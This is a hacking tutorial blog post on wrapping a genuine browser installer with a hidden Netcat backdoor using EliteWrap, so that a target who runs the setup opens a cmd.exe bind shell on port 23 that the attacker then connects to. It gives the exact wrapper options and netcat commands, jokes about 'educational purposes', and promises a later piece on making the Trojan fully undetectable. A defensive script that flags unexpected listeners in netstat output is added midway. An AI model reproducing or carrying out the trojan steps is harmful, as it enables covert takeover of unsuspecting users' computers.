Using Netcat: The Covert Way
Netcat is a really useful tool. It has network debugging features and is also used to investigate networks. We can open a connection on any port, start listening, and write data from one computer to another. When it was first taught to me, I was very curious about it, and the first thought in the back of my mind was how to use it covertly and compromise a system without user intervention. I made this tutorial to show you how you can send it over the wire to any computer and make the target machine listen and connect back to you. But better watch out, it's a powerful tool and this is for "Educational purposes" only, as "they" say…hahaha!
Before reading the tutorial below you should already know about Netcat and its capabilities, because I won't be explaining them here. Reading or performing this with insufficient knowledge won't work, so be well prepared before trying it.
- EliteWrap (a feature-rich wrapper that can wrap more than one program into a single program)
- Netcat (the Windows version if you're trying to create a backdoor on Windows)
- Use the netstat -an command to see the open and listening ports on the system.
- Make sure that netcat.exe or nc.exe is in the same folder as EliteWrap.
- Now open EliteWrap from the command line. Once EliteWrap starts, it will ask for the output file name. Give it any file name you like.
- The next step will ask you to "Enter package #1". Enter the genuine exe file that you want it to open. That file could be anything that the user wants. In this example I gave a browser setup.
- Use the 6th option from the drop-down menu, because we want that particular software to be visible to the user. Next it will ask for the command line; you don't need to fill it in, just press Enter.
- In the next step we need to provide a backdoor, which will be Netcat. Write nc.exe at the "Enter package #2" prompt. In the package options select the 7th option, because we want it to be hidden and unseen. Next you will be asked for the command line; enter "-l -p 23 -t -e cmd.exe".
- That's it for now. You just need the target to click on the program that you just created.
- The target has started the setup, as you can see.
- As you can see, "0.0.0.0:23" is "LISTENING". Our netcat session started after the target user clicked on the setup we created.
- On the attacker's machine, start netcat and connect to the target computer: "netcat -v -n 192.168.65.132 23".
- As you can see, we are now provided with the command line prompt of the target's system and you can now do whatever you want.
- Write netstat -an to check the connection, and YES! We are actually connected to the target.
- Now, to prove that I have control over the target, I have created a directory called "hacker_stuff" on the desktop and then closed the current connection using Ctrl+C.
- The folder on the desktop has been created, as you can see in the image below.
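From the defender's side, the listener and the session in the steps above show up in the same netstat -an output. The following Python script is an added example, not part of the original tutorial: it flags TCP listeners that are not on a baseline and reports the peers connected to them. The allowlist of expected ports and the 192.168.65.1 peer address in the sample are constructed assumptions.

```python
import re

# Ports this host is expected to listen on (assumption: replace with your baseline).
EXPECTED_LISTENERS = {135, 139, 445}

# Constructed sample of Windows `netstat -an` output; the 192.168.65.1 peer is made up.
SAMPLE = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:23             0.0.0.0:0              LISTENING
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    192.168.65.132:139     0.0.0.0:0              LISTENING
  TCP    192.168.65.132:23      192.168.65.1:49712     ESTABLISHED
  TCP    [::]:135               [::]:0                 LISTENING
  UDP    0.0.0.0:500            *:*
"""

# Proto, local addr:port, foreign addr:port, state (IPv6 addresses appear in brackets).
ROW = re.compile(r"^\s*TCP\s+(\S+):(\d+)\s+(\S+):(\d+|\*)\s+(\w+)")

def parse_tcp(text):
    """Yield (local_ip, local_port, remote_ip, state) for each TCP row."""
    for line in text.splitlines():
        m = ROW.match(line)
        if m:
            yield m.group(1), int(m.group(2)), m.group(3), m.group(5)

def audit(text, expected=EXPECTED_LISTENERS):
    """Return (unexpected listening ports, peers with sessions to those ports)."""
    rows = list(parse_tcp(text))
    rogue = sorted({port for _, port, _, state in rows
                    if state == "LISTENING" and port not in expected})
    peers = sorted({(port, remote) for _, port, remote, state in rows
                    if state == "ESTABLISHED" and port in rogue})
    return rogue, peers

if __name__ == "__main__":
    rogue, peers = audit(SAMPLE)
    for port in rogue:
        print(f"unexpected listener on TCP/{port}")
    for port, remote in peers:
        print(f"TCP/{port} has an established session from {remote}")
```

On a live host, running netstat -ano instead adds the owning PID as a fifth column, which the regular expression tolerates and which lets you map the listener back to its process.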
EliteWrap works well when there is no antivirus, or an older/outdated antivirus, on the target. But there are numerous ways to make the Trojan program FUD (Fully Undetectable). I will be talking about that in the next session. Like I always say, be a wise person and do not use these things unless you have a good reason to do so. With netcat you can also make a TFTP connection and download/upload or read/write files from the target to your PC and vice versa. I am providing you with a PDF on Netcat. Read it and let your imagination go wild.
Try this yourself and learn about each step you take and why you take it. This is not going to work on the first try. If it does, it would be just beginner's luck. Keep trying and don't stop until you're finished.
Stay Anonymous! :)